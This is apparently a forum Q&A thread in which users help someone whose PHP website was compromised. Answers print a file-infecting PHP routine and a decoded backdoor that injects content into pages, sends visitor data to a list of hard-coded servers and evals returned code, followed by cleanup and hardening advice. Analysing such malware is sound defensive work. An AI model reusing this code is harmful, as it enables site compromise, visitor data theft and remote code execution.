        $code = $code.'/*'.$md.'_on*/ '.$code_t.' /*'.$md.'_off*/'.' ?>'.$tmp;

        $f = fopen($fname, "w");
        fputs($f, $code);
        fclose($f);
    }
    chmod($fname, 0644);

}

function dir_num($dir) {
    global $fileslist;
    static $deep = 0;

    $odir = @opendir($dir);

    while (($file = @readdir($odir)) !== FALSE) {
        if ($file == '.' || $file == '..') {
            continue;
        } else {
            echo '. ';
            if (
            get_file_extension($file) == 'php') {
                modify($dir.DIRECTORY_SEPARATOR.$file);
            }
        }

        if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
            $deep++;
            dir_num($dir.DIRECTORY_SEPARATOR.$file);
            $deep--;
        }
    }@closedir($odir);
}

Echo 'Wait please...<br>';

$dir = dirname(__FILE__);
dir_num($dir);



echo '<script>window.location.reload();</script>';
exit();

      

this part of the script tries to find other php

files in the current and subdirectories and infects them.

+7


source


I would say remove all such fragments, change all your passwords, and if possible, disable your site until support returns to you. Of course it looks like it's bad, after some digging around the code and decoding I found this:



<?php 

if (!function_exists("GetMama")){
    function mod_con($buf){
        str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;
        }str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;
        }return $buf;
    }function opanki($buf){
        $gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {
            $gz_e = true;
        }if ($gz_e){
            $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);
        } else {$contents = mod_con($buf);
        }$len = strlen($contents);header("Content-Length: ".$len);return($contents);
    } function GetMama(){
        $mother = "www.99bits.com";return $mother;
    }ob_start("opanki");function ahfudflfzdhfhs($pa){
        $mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        } else {$host = "";
        }if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        } else {$ip = "";
        }if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        } else {$ref = "";
        }if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        } else {$ua = "";
        }if (isset($_SERVER["QUERY_STRING"])){
            $qs = urlencode($_SERVER["QUERY_STRING"]);
        } else {$qs = "";
        }$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){
            $ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;
        } if ((ini_get("allow_url_fopen")) && $try) {
            $ult = trim(@file_get_contents($url_0 . $url_1));$try = false;
        }if($try){
            $fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {
                $out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {
                    $ret  .=  fgets($fp, 128);
                }fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
            }
        }  if (strpos($ult,"eval") !== false){
            $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
        }if (strpos($ult,"ebna") !== false){
            $_SERVER["good"] = str_replace("ebna","",$ult);return true;
        }else {return false;
        }
    }$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){
        if ( ahfudflfzdhfhs($ur) ) {
            break ;
        }
    }
}

      

+5


source


Based on a security background, I'm pretty sure your webserver has been hacked. To begin with, it is usually a good idea to investigate the source to avoid repeating this error.

To start:

  • Find the first files infected via timestamps.
  • Log active startup scripts to determine what is causing this, or errors in your PHP logs, etc.

If you are using shared hosting you cannot do this, shared hosting users are generally more vulnerable to hacking, but if you are on a VPS or better you can contact your host in case of managed hosting for full format or required security ...

However, the fact is that deleting these fragments will not be used 99.99% of the time, this will not prevent an attacker in the future. Changing passwords helps, but again, it's not a solid solution.

If you have the resources, hire a security professional to conduct a quick audit. There are many that only require payment if they find weakness. If not, then reevaluate the potential weaknesses on your server. See this section for Linux servers (http://www.thegeekstuff.com/2011/03/apache-hardening). If you are using Windows please let me know, I will link you to several for Windows IIS.

Glad I could help!

+1


source


It seems to be a php type wrapper script that is injected into your site. It could be a vulnerability in your web host or your personal web application that could be hacked.

0


source







All Articles